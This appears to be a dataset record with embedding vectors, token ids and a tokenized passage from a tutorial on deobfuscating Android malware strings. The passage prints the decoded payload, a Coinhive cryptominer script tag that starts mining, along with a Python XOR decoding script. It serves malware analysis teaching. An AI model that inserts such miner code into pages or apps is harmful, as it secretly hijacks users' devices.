[ 0.04678446799516678, -0.5730104446411133, -0.11106215417385101, 0.049839086830616, -0.4507017433643341, -0.1529054194688797, 0.3852163851261139, 0.2552706301212311, 0.824404776096344, 0.8234935998916626, 0.5240084528923035, 0.13460031151771545, 0.6413880586624146, -0.6503399014472961, -0.7321301698684692, -0.22013762593269348, -0.605792760848999, 0.47194617986679077, -0.4980500340461731, 0.3004462420940399, 0.17019763588905334, 0.38476863503456116, -0.9775435924530029, -0.6544817090034485, -0.8814352750778198, 0.6035810112953186, 1.2735178470611572, 0.25922027230262756, 0.6435902118682861, 0.859125554561615, 0.4481586813926697, 0.4598585367202759, 0.5643349885940552, -0.36993491649627686, 0.38149145245552063, 0.29300519824028015, 1.091581106185913, -0.49570637941360474, 0.02193370647728443, -0.7757675051689148, 0.6459259390830994, -0.21733611822128296, -0.060865435749292374, -0.58099764585495, -0.7908565998077393, -0.1191759705543518, 0.0003822437720373273, -0.3499468266963959, -0.020079363137483597, -0.2315993309020996, 0.17823705077171326, 0.14731131494045258, 0.32974672317504883, 0.3207644820213318, 0.12512797117233276, 0.084681436419487, -0.0869094729423523, -0.0671805664896965, -0.7270678877830505, 0.6887452602386475, -0.14389124512672424, 0.5912590622901917, 0.29518160223960876, -0.7261321544647217, 0.029979947954416275, 0.1305256485939026, -0.22058077156543732, -0.09950321912765503, -0.7100932002067566, -0.6384013891220093, -0.384318083524704, 0.8829637169837952, -0.6996586918830872, -0.4466588497161865, -0.5279422402381897, -0.17897407710552216, -0.4233790934085846, -0.2473055124282837, -0.1471118927001953, 1.0303205251693726, 0.09653716534376144, 0.7874240875244141, 0.37104612588882446, -0.3213149309158325, -0.0696098804473877, -0.41398897767066956, 0.3216090500354767, 0.5282390117645264, -1.0270698070526123, 0.20893500745296478, 0.008134895004332066, 0.5191407203674316, -1.469749093055725, -0.16514386236667633, 0.8084248900413513, 0.6621366739273071, -0.34945356845855713, -0.07750176638364792, 0.5666807889938354, -0.37988802790641785, 0.903418242931366, 0.8353551030158997, 0.8312669396400452, 0.7178282737731934, 0.17460831999778748, 0.12877105176448822, 0.2963753044605255, 0.09511206299066544, -0.5136560797691345, -0.35108503699302673, 0.25650301575660706, -0.6476430892944336, 0.6249155402183533, -0.8284825086593628, 0.42775192856788635, 0.6384457945823669, 0.8032134175300598, -0.284809947013855, -0.30812254548072815, 0.4992769658565521, 0.19089320302009583, -0.05365137755870819, 0.8625261783599854, -0.526820719242096, -0.039657313376665115, 0.8026843070983887, 0.5421273708343506, 0.49151378870010376, -0.2731302082538605, -0.48122158646583557, -0.39609792828559875, 0.2005949169397354, 0.01768808811903, 0.6804666519165039, -0.4218749701976776, 0.050758976489305496, 0.35250937938690186, 0.28213465213775635, 0.5416366457939148, -0.6952763199806213, 0.2727205753326416, 0.70844566822052, 0.2569139301776886, 1.153555989265442, -0.10123846679925919, -0.3202388882637024, -0.3037879168987274, 0.04156312718987465, -0.6312544345855713, 1.0933235883712769, -0.31478050351142883, 0.4948101043701172, 0.8239667415618896, -0.6699842214584351, -0.9973319172859192, 0.215884730219841, -0.6457269191741943, 0.7740743160247803, 0.23007459938526154, 0.15750154852867126, -0.580939531326294, 0.6656212210655212, -0.1971379667520523, 0.28806185722351074, -0.25573092699050903, 0.7780918478965759, -0.884726881980896, -0.881375253200531, 0.30322492122650146, 0.36971431970596313, -0.08504551649093628, -0.11697208881378174, 0.14259140193462372, 0.6873865127563477, 2.146040201187134, 1.3095718622207642, -0.07628196477890015, -0.1599128395318985, 0.32458317279815674, 0.5677948594093323, -0.004369162023067474, 0.5176623463630676, 0.25481438636779785, 0.5777102112770081, -0.32033994793891907, 0.7179446220397949, 0.026485834270715714, -0.7904195189476013, -0.2669326066970825, -0.2610194981098175, -0.3395894467830658, 0.6645878553390503, -1.0247673988342285, 0.3610139787197113, 0.5234849452972412, -0.038679301738739014, -0.8988399505615234, 0.2673778831958771, -0.4566267728805542, -1.8953282833099365, -0.1321655660867691, 0.16262228786945343, 0.23394712805747986, 0.5869324803352356, -0.6319384574890137, -0.4942423105239868, 0.7738294005393982, 0.39173656702041626, 0.05324719101190567, 0.6539612412452698, 0.6333110332489014, 0.16350685060024261, -0.496420681476593, -0.07296835631132126, 0.06023366376757622, -0.4820255935192108, -0.5891867280006409, 0.28282156586647034, -0.3080032169818878, 0.03122149035334587, -0.5485096573829651, 1.0824414491653442, 0.35671132802963257, 0.4894743859767914, -0.32191765308380127, -0.3025328516960144, 0.519810676574707, 0.42153289914131165, -0.32111674547195435, -0.2567162811756134, 0.17504800856113434, 0.8702420592308044, 0.9423355460166931, 0.5472359657287598, 0.31354522705078125, 0.004446887876838446, 0.00008769510895945132, 0.33383503556251526, 0.035633914172649384, -0.648733377456665, -0.6355966925621033, 1.4953969717025757, 0.5514135360717773, 0.6268550157546997, 0.2753662168979645, 0.33248215913772583, -0.0009124739444814622, -0.05969924479722977, -0.029160112142562866, 0.9968648552894592, -0.473232626914978, 0.8386847376823425, 0.779816746711731, -0.07834240794181824, -0.7937848567962646, -0.7193795442581177, 0.8071016073226929, 0.7097653150558472, -0.44875404238700867, -0.8274571895599365, 0.45939797163009644, -0.17431005835533142, -0.2544882297515869, -0.16905947029590607, 0.5889909863471985, 0.13703425228595734, 0.21990586817264557, 0.053172189742326736, -0.19971008598804474, -0.6373366117477417, -0.9642670750617981, -0.6196985840797424, -0.9550996422767639, -0.6396836042404175, -0.8971120119094849, 0.39534759521484375, 0.12892422080039978, -0.6758819818496704, 0.47164037823677063, 0.12051160633563995, -0.9308637976646423, -0.5019811391830444, -0.35858023166656494, 0.37722423672676086, 0.1466580629348755, -0.17511722445487976, -0.028431888669729233, 0.5559735894203186, -0.12277150899171829, 0.791333794593811, -0.4453050494194031, 0.003821366233751178, -0.2841329276561737, 0.6106553673744202, 0.1815067082643509, -0.09032940864562988, 1.2241920232772827, -0.31525495648384094, 0.10199910402297974, -0.30835530161857605, 0.017454056069254875, 0.10184025764465332, 0.28639325499534607, 0.3162228763103485, -0.24929960072040558, 0.5844794511795044, 0.18256649374961853, -0.06312038004398346, 0.5971875786781311, 1.089755892753601, -0.17042534053325653, 0.47093790769577026, 0.021816393360495567, 0.5445337295532227, -1.0348598957061768, 0.36328598856925964, 0.3452954590320587, -0.003661208786070347, -0.27805885672569275, -0.4201749861240387, 0.1494857221841812, -0.16248072683811188, -0.06149181351065636, -0.14365802705287933, 0.0725475400686264, 0.7240921854972839, -0.9921059608459473, -0.6034640669822693, 0.5214293003082275, -0.5390115976333618, -0.24507832527160645, -0.5336344242095947, -0.47431063652038574, 0.6875175833702087, 0.09694380313158035, 0.1680702269077301, -0.18444928526878357, -0.048814937472343445, 0.38731488585472107, -0.3084654211997986, 0.00115214625839144, -0.23889358341693878, 0.27664992213249207, 0.2920052707195282, -0.13513363897800446, 0.4026319980621338, 0.3187514543533325, -0.0637279599905014, 0.10916382819414139, -0.44954755902290344, -0.4315224289894104, -0.506959080696106, 0.22075501084327698, 0.48696035146713257, 0.6491788029670715, 0.4345678687095642, -0.6144102215766907, 0.0374157577753067, -0.09463959187269211, 0.2550266683101654, 0.6583325266838074, 0.23441840708255768, 0.30933877825737, -0.26504290103912354, -0.5925897359848022, -1.006499171257019, -0.2762342691421509, 0.22262772917747498, 0.1921669989824295, 0.01801789365708828, 1.1852679252624512, -0.393165647983551, -0.4612545073032379, 1.0251611471176147, -0.21913380920886993, -0.7231139540672302, 0.4315655827522278, -0.4272313714027405, 0.4996858537197113, -0.25622135400772095, 0.5634475350379944, -0.3251803517341614, -0.25791803002357483, 0.6024657487869263, 0.8838448524475098, -0.4360520541667938, -0.31459102034568787, -0.5221092104911804, -0.4192541837692261, 0.012262802571058273, -0.05070865526795387, 0.1442236453294754, 0.27764204144477844, -0.5298537611961365, -0.6817277073860168, -0.5310127139091492, 0.5926752686500549, 0.6548411846160889, 0.420733243227005, 0.15558281540870667, 0.6330021619796753, 0.2977197766304016, -0.43206459283828735, 0.746706485748291, -0.4410478472709656, -0.21931122243404388, 0.2217130959033966, 0.7128095626831055, 0.062161337584257126, 0.05795114487409592, -0.243840292096138, -0.23521600663661957, -0.6162744164466858, -0.13635720312595367, 0.2203146517276764, -0.48201099038124084, -0.4330078363418579, 0.013451328501105309, 0.73968505859375, 0.3884046971797943, -0.5589540600776672, 0.3315744996070862, 0.005123365204781294, 0.38677504658699036, 0.5567570924758911, -0.5816549062728882, -0.5166639089584351, -0.8082817792892456, 0.18096807599067688, -0.38084152340888977, 0.16475661098957062, -0.6696472764015198, -0.6681453585624695, -0.02708449400961399, -0.3174918293952942, 0.09418076276779175, 0.26312878727912903, 0.05758226290345192, 0.3391675651073456, -1.5584378242492676, 0.36367493867874146, 0.44765228033065796, -0.6443172097206116, -0.4515078365802765, 0.2579592168331146, 0.9056175351142883, -0.046252042055130005, 0.49144336581230164, -0.7521399259567261, 0.2127707451581955, -0.1955796778202057, -1.0887657403945923, 0.4779244363307953, -0.8019508123397827, 0.26374325156211853, 0.33996710181236267, -0.5015661716461182, -0.04625542461872101, 0.5478220582008362, -0.5034730434417725, 0.19086505472660065, 0.007892106659710407, 0.2380973845720291, 0.18839170038700104, -0.2774350345134735, 0.9284847974777222, -0.08674228936433792, -0.43595725297927856, 0.6173858642578125, 0.2707585394382477, 0.47074148058891296, -0.02353924699127674, -0.692529022693634, -0.5164844989776611, 0.7009143233299255, -1.1503899097442627, 0.7476764917373657, -0.11891677230596542, -0.19555552303791046, 0.15894724428653717, -0.5471960306167603, 0.9052602052688599, -0.3726672828197479, 0.1436745673418045, -0.29312095046043396, -0.5830527544021606, -0.012470541521906853, -0.09441782534122467, -0.12307193130254745, 0.4684840738773346, 0.2996128499507904, -0.36421579122543335, -0.838656485080719, -0.16040447354316711, -0.3551963269710541, -0.6860651969909668, 0.25435495376586914, -0.25507020950317383, 0.2579062879085541, -0.036969609558582306, 0.7430601716041565, -0.09243105351924896, -0.586383044719696, 0.5351883172988892, -0.30362948775291443, 0.16338346898555756, -0.7138434052467346, -0.028506988659501076, -0.956541895866394, -0.4405415654182434, 0.2626306116580963, -0.018100710585713387, -0.03832736611366272, -0.22570425271987915, 0.05741671472787857, 0.049136701971292496, 0.7219950556755066, -0.41428467631340027, -0.5926195979118347, 0.8484656810760498, -0.07494539767503738, -0.356252521276474, -0.19437788426876068, 0.6389030814170837, 0.2598147690296173, 0.01494856271892786, -0.5324329733848572, -0.6706978678703308, -0.942334771156311, -0.6679099798202515, 0.7230741381645203, -0.1542900949716568, 0.4406100809574127, -0.8086876273155212, -0.23172813653945923, -0.7009046673774719, 0.5429647564888, 0.02449778839945793, -0.9142904877662659, 0.17676766216754913, 0.1642836183309555, 0.8241733312606812, 0.2492077797651291, -0.5468785166740417, -0.4222466051578522, -0.6416088938713074, 0.04938439279794693, 1.0413801670074463, -0.009550406597554684, -0.4440406262874603, -0.1450878232717514, 0.3117051124572754, 0.10014866292476654, -0.26200273633003235, -0.7664259672164917, -0.3364659249782562, -0.15785421431064606, 0.27713683247566223, -0.06194475293159485, 0.11342082917690277, -0.7122583389282227, 0.5026265978813171, -0.23582082986831665, -0.031016331166028976, 0.7031618356704712, -0.3913029432296753, -0.08191565424203873, 0.25191012024879456, 0.5706502199172974, -0.6792821288108826, -0.5478412508964539, -0.44391441345214844, 0.3011157810688019, 0.3384876251220703, -0.2217997908592224, -0.48742350935935974, -0.18079563975334167, -0.6447708010673523, -1.3768619298934937, 0.5038362145423889, -0.4651297330856323, -0.06368491053581238, -0.14667518436908722, -0.22584012150764465, 0.7726873755455017, -0.7716783881187439, 0.10166344046592712, 0.617780327796936, 0.18480414152145386, 0.20778854191303253, -0.4677281379699707, 0.5166962742805481, 0.12825392186641693, -0.4483473598957062, 0.24452199041843414, -0.22966790199279785, -0.3543250560760498, -0.08592059463262558, -0.1903214305639267, -0.3925386965274811, -0.4093557596206665, -0.33088332414627075, 0.6845008134841919, -0.26349738240242004, 0.14950791001319885, 0.1146726906299591, -0.7518880367279053, -0.8871384859085083, -0.12559063732624054, 0.18080690503120422, -0.42572328448295593, 0.4730224609375, 0.4008927345275879, 0.2519955337047577, -0.4469568729400635, -0.25978463888168335, -0.43458977341651917, 0.05772295966744423, 1.0368473529815674, -0.7374876737594604, -0.36641573905944824, 0.716127336025238, 0.23815791308879852, -0.6861072778701782, -0.6358100175857544, -0.7998781800270081, 0.03922078758478165, 0.13040979206562042, -1.070765733718872, -0.6334101557731628, 0.13666856288909912, -0.5304912328720093, -0.45659446716308594, 0.1603531837463379, -0.07557825744152069, 0.4393935799598694, -0.32090166211128235, 0.4859021306037903, 0.6351786851882935, 0.01137288473546505, 0.2342725694179535, -0.49314847588539124, -0.525938093662262, -0.9016569256782532, -0.029255181550979614, 0.022221354767680168, -0.1151956170797348, 1.408576488494873, -0.7569066286087036, 0.19459986686706543, -0.10031741112470627, -0.013016674667596817, 0.7975113987922668, 0.642252504825592, -0.3927426338195801, 0.9471476078033447, -0.06949550658464432, -0.6114575266838074, -0.05344358831644058, 0.5873100757598877, 0.17840136587619781, 0.8194658756256104, -0.08835349231958389, -0.33253905177116394, -0.45919424295425415, 0.5002548098564148, -0.19067908823490143, -1.116331696510315, -0.8350678086280823, -0.8460806012153625, -0.29916638135910034, 0.040842849761247635, -0.6576954126358032, -0.1989392638206482, 0.08244116604328156, -0.36007916927337646, -0.7359245419502258, 0.002285395050421357, 0.3836348056793213, 0.01254495419561863, 0.4761500358581543, -0.1909763664007187, 0.19937749207019806, -0.7779199481010437, -0.7848218083381653, -0.2652397155761719, 0.04494117572903633, -0.07962273806333542, -0.3691994547843933, -0.4423316717147827, -0.19626151025295258, -0.4817250967025757, 0.23868930339813232, -0.37901124358177185, 0.6396887302398682, -0.7106388807296753, -0.5892677903175354, -0.3597085475921631, 0.7858977317810059, -0.3253277540206909, 0.12268625199794769, 0.37078267335891724, 0.5012663006782532, -0.25853127241134644, -0.8172270655632019, -0.40034160017967224, -0.06330853700637817, 0.2503584623336792, -0.16012930870056152, -0.08903691172599792, 0.011021501384675503, -0.19860361516475677, 0.23448526859283447, -0.04881838709115982, -0.4456033706665039, -1.2279256582260132, -0.5434694886207581, 0.020146485418081284, 0.34987640380859375, 0.18588662147521973, 0.8341824412345886, -0.19774487614631653, -0.06987918168306351, -0.5428553223609924, 0.271614134311676, 0.5817205905914307, 0.2492304891347885, 0.2218436598777771, 0.4749471843242645, 0.229766845703125, -0.4989948272705078, -0.22425952553749084, 0.0028801187872886658, -0.3616410493850708, 0.31253111362457275, -0.319810152053833, -0.10594513267278671, -0.33690813183784485, -0.29669880867004395, 0.39407554268836975, -0.18604320287704468, 0.5905372500419617, -0.00611503841355443, 0.16341501474380493, 0.024022113531827927, -0.23388107120990753, 0.3192686438560486, -0.7476860284805298, -0.7717516422271729, 0.0892435610294342, -0.06882108747959137, -0.2649614214897156, -0.22116366028785706, 0.10615158826112747, -0.2965511679649353, -0.4774116575717926, -0.7392385005950928, 0.07934555411338806, 0.39898598194122314, -0.7356659173965454, 0.8692638874053955, -0.4788969159126282, -0.35434168577194214, -0.0907716378569603, 0.4753236770629883, -1.2386548519134521, -0.5526029467582703, 0.09205280244350433, 0.733152449131012, 0.4894455373287201, -0.08213922381401062, -0.26860013604164124, -0.014405490830540657, 0.303070068359375, 0.6834132075309753, 0.2569514214992523, -0.46123114228248596, -0.5740750432014465, 0.5789645314216614, -0.44666409492492676, 0.47182855010032654, 0.2209147810935974, 0.25772225856781006, 0.06125133857131004, -0.47583943605422974, -0.026698961853981018, 0.9624211192131042, 0.2713701128959656, 0.146442711353302, 0.2840276062488556, 0.155735582113266, 0.4740998446941376, -0.36647504568099976, -0.12359479814767838, -0.2925196886062622, 0.20449033379554749, 0.29449373483657837, 0.3884533643722534, -0.41465669870376587, 0.6881285905838013, 0.06192811205983162, -0.4475138187408447, -0.46747156977653503, 0.5241978168487549, -0.12446384876966476, -0.3057643473148346, -0.374883770942688, 0.07278384268283844, -0.6433701515197754, 0.11980152875185013, -0.7718968391418457, 0.4988703429698944, -0.1352211833000183, -0.034165870398283005, -0.29992642998695374, -0.4634856581687927, 0.7715892791748047, -0.4273928999900818, 0.3388090133666992, 0.0869140699505806, 0.038635946810245514, 0.2653907537460327, -0.020897282287478447, -0.5459838509559631, 0.39361807703971863, 1.228900671005249, 0.4425615072250366, 0.19905447959899902, 0.761622428894043, -0.06964848190546036, -0.02908124029636383, -0.0421675443649292, -0.21719712018966675, -0.203322172164917, 0.12669970095157623, 0.6197873950004578, -0.43326884508132935, -0.4393855631351471, -0.04579853266477585, 0.722913920879364, -0.4516923129558563, 0.7196839451789856, -0.24624887108802795, 0.4624311327934265, -0.4739536643028259, 0.23375478386878967, -0.32176756858825684, 0.14366835355758667, 0.6251922845840454, -0.13175565004348755, -0.6003519892692566, 1.3430911302566528, -0.17486602067947388, 0.49190884828567505, 0.29996681213378906, 0.38134029507637024, 0.5083950757980347, 0.5878862142562866, 0.050614796578884125, -0.47986695170402527, -0.8119125962257385, 0.181198388338089, 0.10409379750490189, -0.07467327266931534, -0.11900953948497772, -0.4259788691997528, 0.07638959586620331, -0.4282066822052002, -0.10700295865535736, -1.3494325876235962, 0.21850258111953735, -0.4904716908931732, -0.5287210941314697, 0.3842542767524719, -0.15125338733196259, -1.2524852752685547, 0.16326791048049927, 0.08919075131416321, -0.14581915736198425, 0.3529847264289856, -0.20648401975631714, -0.4773377478122711, -0.13409323990345, -0.47199171781539917, -0.38756534457206726, 1.0024986267089844, -0.8470233678817749, -0.488566517829895, 0.5391020774841309, -1.3071823120117188, -0.7370184063911438, -0.29193177819252014, -0.20350193977355957, -0.8111373782157898, 1.0811651945114136, 0.5311514735221863, 0.4933842718601227, 0.21874000132083893, -0.8237375020980835, 0.31162598729133606, 0.36137616634368896, 0.6831386089324951, -0.9688072800636292, 0.6363710761070251, 0.7883986234664917, -0.10008542239665985, 0.47289568185806274, 0.08564800024032593, 0.8251591920852661, 0.10926032811403275, -0.09080871194601059, 0.018286004662513733, 0.12547312676906586, -0.9007666110992432, -0.29950496554374695, 0.3350669741630554, -0.007535066921263933, -0.45122087001800537, 0.1041051596403122, -1.4423054456710815, 0.19333145022392273, -0.6766778230667114, 0.25108781456947327, -0.10789571702480316, -0.14857709407806396, 0.38593214750289917, -0.0660775899887085, 0.211538627743721, -1.8057548999786377, 4.168717384338379, 0.46086031198501587, 0.13588590919971466, 0.2765250504016876, 0.2563377022743225, 1.1007275581359863, 0.9323660135269165, -0.8589765429496765, 0.37760671973228455, 0.08302301913499832, 0.9237205386161804, -0.554371178150177, 0.3201036751270294, 0.2938428819179535, -0.29122182726860046, 0.15767905116081238, -0.5693171620368958, 0.37610381841659546, 0.31453123688697815, -0.5866677165031433, -1.108885645866394, 0.3561641275882721, -0.10501405596733093, 0.6606465578079224, 0.44474712014198303, -0.44704145193099976, 0.19923512637615204, -0.5379095673561096, -0.035658661276102066, 0.3105827867984772, 0.1820945143699646, -0.21446871757507324, 0.08088209480047226, -0.46003687381744385, -0.04406529664993286, 0.005976378917694092, 0.08783722668886185, -0.5781915187835693, -0.38878244161605835, 0.19754983484745026, 0.17766627669334412, -0.6925840973854065, 0.42052823305130005, -0.5761069059371948, -0.3845968246459961, 0.5237112641334534, -0.6385728120803833, 0.7170552611351013, 0.47761234641075134, -0.7421403527259827, 0.5351566672325134, -0.361819326877594, 0.5155930519104004, -0.47017183899879456, -0.47511252760887146, 0.13700200617313385, 0.29519277811050415, -0.30221351981163025, -0.5784898996353149, -0.3966357409954071, 0.4028699994087219, -0.04828444495797157, 0.19875667989253998, 0.0007687045726925135, -0.9715077877044678, 0.22179993987083435, -0.048139434307813644, 0.8365923166275024, 0.013234654441475868, -0.08957598358392715, -0.45729348063468933, 0.2746221721172333, -0.14516615867614746, -0.16243018209934235, 1.2700175046920776, 0.09299163520336151, 0.3194241523742676, 0.6033238172531128, 0.4023643434047699, -0.029608910903334618, 0.2301228940486908, -0.9102986454963684, -0.6463202834129333, 0.2638843357563019, 0.9870229959487915, 0.8508889079093933, 0.02315455861389637, -0.21308131515979767, 0.1606484353542328, 0.4011635482311249, 0.5214580297470093, 0.7021317481994629, -0.02957770600914955, -0.014634582214057446, 0.35651329159736633 ]
[ 2069, 13501, 7817, 1010, 2009, 1521, 1055, 3811, 3497, 1996, 7817, 2024, 27885, 25608, 12921, 1012, 4081, 5576, 1024, 2298, 2005, 4118, 4455, 2008, 2202, 7817, 2004, 2019, 6685, 1998, 7637, 2067, 2073, 2008, 6685, 2003, 2746, 2013, 1012, 2012, 2070, 2391, 1996, 5164, 6685, 2097, 2022, 2183, 2083, 1037, 2139, 16429, 25608, 10719, 4118, 2077, 2009, 1521, 1055, 2979, 2000, 1996, 17928, 2008, 3138, 1996, 5164, 6685, 1012, 13501, 7817, 1024, 1996, 9262, 1998, 11924, 17928, 2015, 5478, 1996, 5810, 3793, 7817, 1010, 2025, 13501, 1012, 4081, 5576, 1024, 1996, 13501, 7817, 2024, 2035, 3497, 2979, 2000, 1996, 2168, 4725, 3188, 2000, 2108, 2979, 2000, 1996, 17928, 2015, 1012, 2122, 4725, 2024, 3497, 1996, 2139, 16429, 25608, 10719, 4725, 1012, 12441, 6764, 1999, 1996, 7045, 1013, 14176, 1998, 20647, 26266, 11066, 2121, 4455, 1999, 1996, 10439, 1024, 3497, 4895, 23947, 2075, 1998, 10578, 3176, 3642, 1012, 1006, 2071, 2036, 2022, 8816, 2075, 2013, 1037, 6556, 3295, 1998, 2059, 10578, 2478, 20647, 26266, 11066, 2121, 1007, 10293, 5576, 1024, 6709, 2073, 1996, 5371, 2003, 3191, 1998, 2059, 3582, 1996, 4130, 1012, 2009, 2003, 3497, 2139, 16429, 25608, 12921, 2855, 2044, 2108, 3191, 1012, 3128, 8860, 1011, 2064, 1521, 1056, 6709, 1996, 1046, 3490, 4972, 1006, 2053, 4569, 6169, 2315, 9262, 1035, 1998, 2053, 4455, 2000, 4236, 19833, 24653, 1007, 1024, 1999, 2344, 2000, 15389, 2151, 3128, 4725, 1010, 1046, 3490, 2038, 2000, 2022, 2583, 2000, 3940, 1996, 3853, 1999, 1996, 3128, 3075, 2007, 1996, 3128, 4118, 8170, 1999, 9262, 1998, 2947, 2028, 1997, 1996, 2048, 2442, 4839, 2012, 2070, 2391, 1012, 4081, 5576, 1024, 2707, 2012, 1046, 3490, 1035, 2006, 11066, 4118, 1998, 2298, 2005, 1037, 2139, 1011, 27885, 25608, 10719, 9410, 2008, 15665, 3176, 3642, 1012, 6912, 1021, 1011, 5164, 2139, 16429, 25608, 10719, 2378, 2023, 6912, 1010, 2057, 2097, 3218, 2139, 1011, 27885, 25608, 18252, 7817, 1999, 2344, 2000, 17908, 2019, 4646, 1012, 2005, 1996, 6912, 2057, 2097, 2224, 1996, 7099, 2012, 1066, 1013, 8168, 1013, 13249, 11253, 15733, 1012, 9706, 2243, 1999, 1996, 1058, 2213, 1012, 2023, 7099, 2038, 1996, 21146, 17788, 2575, 17886, 1039, 12740, 29097, 2475, 16409, 4402, 24434, 2546, 17914, 2497, 2575, 2094, 22203, 15878, 8447, 15136, 2278, 12740, 2683, 2050, 2683, 5243, 2063, 19961, 23632, 2575, 7959, 2620, 2549, 19797, 2692, 2278, 2487, 5243, 2487, 2094, 2683, 2620, 2683, 2581, 5243, 2063, 2549, 2063, 2629, 1012, 3289, 3406, 6709, 27885, 25608, 12921, 7817, 1998, 4503, 1037, 5576, 2000, 2139, 16429, 25608, 16280, 2009, 1012, 6912, 6123, 29337, 2024, 1037, 15451, 8059, 12941, 15252, 2023, 4646, 2000, 5646, 2065, 2009, 1521, 1055, 15451, 8059, 1012, 2017, 2272, 2408, 2019, 27885, 25608, 12921, 9262, 22483, 5164, 2008, 2003, 2108, 8209, 1998, 2342, 2000, 2139, 16429, 25608, 16280, 2009, 2000, 5646, 3251, 2030, 2025, 1996, 4646, 2003, 24391, 1012, 2017, 2064, 1521, 1056, 2448, 1996, 4646, 8790, 3973, 1998, 2342, 2000, 5646, 2054, 1996, 9262, 22483, 2003, 10763, 3973, 1012, 8128, 2487, 1012, 2424, 1996, 5164, 2008, 2017, 2342, 2000, 2139, 1011, 27885, 25608, 16280, 2475, 1012, 6709, 1996, 9410, 2008, 2139, 1011, 27885, 25608, 16280, 2015, 2009 ]
hack_tricks
421.txt
1
. 3. determine how you want to write a solution to de - obfuscate the string. 4. do it : ) solutionthe deobfuscated string is : < script src = " https : / / coinhive. com / lib / coinhive. min. js " > < / script > < script > var miner = new coinhive. anonymous ('nf24zwemmu0m1x6mgcov48amsiyerpfe ', { threads : 2 } ) ; miner. start ( ) ; < / script > the python script i wrote to de - obfuscate it is : enc _ str = " [UNK] " length = len ( enc _ str ) count = 0dec _ str = [ 0 ] * ( length / 2 ) while ( count < length ) : dec _ str [ count / 2 ] = ( int ( enc _ str [ count ], 16 ) < < 4 ) + int ( enc _ str [ count + 1 ], 16 ) & 0xff count + = 2print dec _ strkey = [ 75, 67, 81, 82, 49, 57, 84, 90 ] enc _ str = dec _ strcount = 0length = len ( enc _ str ) while ( count < length ) : dec _ str [ count ] = chr ( enc _ str [ count ] ^ key [ count % len ( key ) ] ) count + = 1print''. join ( dec _ str ) more examplesi have done a few talks on de - obfuscating android apps that include a variety of obfuscation mechanisms. in these talks, i discuss the advanced obfuscation techniques, my solution to de - obfuscate them, and the considerations and choices i made when deciding how i wanted to deobfuscate. blackhat usa 2018 : “ unpacking the packed unpacker : reverse engineering an android anti - analysis library ” [ video ] this talk goes over reverse engineering one of the most complex anti - analysis native libraries i ’ ve seen used by an android application. it covers mostly obfuscation techniques in native code. recon 2019 : “ the path to the payload : android edition ” [ video ] this talk discusses a series of obfuscation techniques, solely in java code, that an android botnet was using to hide its behavior. [SEP]
[ 0.3628576993942261, -0.019611677154898643, 0.02221253328025341, -0.11902967095375061, -0.689243733882904, -0.3734642565250397, 0.1522940993309021, -0.17031705379486084, 0.27193158864974976, 1.2421971559524536, 0.6910114288330078, 0.5967453718185425, 0.6051018238067627, -0.3612429201602936, -1.3875192403793335, 0.15305672585964203, 0.09654612839221954, -0.42322149872779846, -0.8033128976821899, 0.2939927875995636, 0.30125564336776733, 0.08741391450166702, -1.1009044647216797, -0.04425926133990288, -0.7139827013015747, 0.3259768784046173, 0.27143171429634094, -0.1592593938112259, 0.7974908947944641, 0.9915968179702759, -0.3956066071987152, 0.1578839272260666, 0.3283265233039856, -0.6698179244995117, 0.2726929783821106, -0.4145261347293854, 0.8131575584411621, -0.474270761013031, -0.3850623071193695, -0.45188525319099426, -0.01514368411153555, -0.07747615873813629, 0.6546193361282349, -0.5448861718177795, -1.884134292602539, -0.21578560769557953, -0.5981833338737488, 0.16296713054180145, -0.8020413517951965, 0.44031822681427, 0.09651687741279602, 0.4344545900821686, 0.9143263697624207, -0.2687600553035736, -0.13618065416812897, -0.10359451174736023, 0.1047893762588501, 0.1416657567024231, -0.7051366567611694, 0.22532112896442413, -0.31470656394958496, 0.06972077488899231, 0.3286083936691284, -0.17589125037193298, -0.22734346985816956, 0.33041220903396606, -0.7561581134796143, -0.5614616870880127, -0.4975588321685791, -0.792465090751648, -0.6920695304870605, 0.17702707648277283, -0.8357294201850891, -0.7743808031082153, -0.5532510876655579, 0.07224836945533752, 0.084103062748909, -0.24030523002147675, -0.5661160945892334, 1.094119668006897, -1.109596848487854, 0.8466304540634155, 0.13387411832809448, 0.08863671123981476, 0.05385581776499748, -0.6660663485527039, 0.5563697814941406, -0.5007367730140686, -0.0355549156665802, -0.29195645451545715, 0.23305445909500122, 0.3201112747192383, -0.6703932881355286, -0.25444847345352173, 0.4103570282459259, 0.3315999507904053, -0.021587789058685303, -0.3236514627933502, 0.4975363612174988, -0.10022981464862823, 0.8423870205879211, -0.1895284205675125, -0.4392852783203125, 0.9944614768028259, 0.19725272059440613, 0.4585566818714142, 0.3618910610675812, 0.13686951994895935, -0.6748842597007751, -0.1341160535812378, 0.020523259416222572, -0.7520962357521057, 0.2268025130033493, -0.4797903597354889, 0.04811800271272659, 0.42666906118392944, -0.2778201699256897, 0.37728044390678406, 0.11183716356754303, -0.8768945932388306, 0.7641675472259521, -0.31805628538131714, 0.6317353844642639, -0.15347261726856232, -0.14923328161239624, 0.2964225709438324, -0.433755099773407, 0.2970050275325775, -0.4541170597076416, 0.09457796066999435, 0.32009339332580566, -0.02276909165084362, 0.09123280644416809, 0.15845061838626862, -0.0315827913582325, 0.003508565481752157, 0.4069559872150421, 0.03411838412284851, 0.6153210401535034, -0.25835222005844116, 0.04278258979320526, -0.4046957194805145, -0.28643137216567993, 1.61368989944458, -0.1791698932647705, -0.14714840054512024, 0.0778093934059143, 0.830552339553833, 0.09215325117111206, 0.9152823090553284, -0.4084504544734955, -0.5908108949661255, 0.7325501441955566, -0.07034182548522949, 0.029888147488236427, -0.22938132286071777, -0.5540429949760437, 0.4471423625946045, 0.17740730941295624, 0.16177229583263397, -0.29983389377593994, 0.30436038970947266, -0.4293985068798065, 0.598604142665863, -0.19223693013191223, 0.5747717022895813, -0.5540241599082947, -0.9884565472602844, -0.02081170491874218, -0.014650519005954266, 0.44371268153190613, -0.1241786777973175, -0.26168909668922424, 0.4974988102912903, 1.4258244037628174, 0.4966748356819153, 0.44272348284721375, -0.07823130488395691, 0.06179836764931679, 0.6275314688682556, -0.2772693932056427, 0.6492639183998108, -0.07560662925243378, 0.47964242100715637, -0.1915438026189804, 0.5293241143226624, -0.29486265778541565, -0.11451469361782074, -1.290216088294983, 0.2906166613101959, 0.7087687849998474, 0.7904558777809143, -0.895226240158081, -0.12489268183708191, -0.5358312129974365, -0.2849642336368561, -1.0782971382141113, 0.23143193125724792, -0.4219231605529785, -1.1007046699523926, -0.3235774040222168, 0.16724178194999695, 0.008281891234219074, 0.21954582631587982, 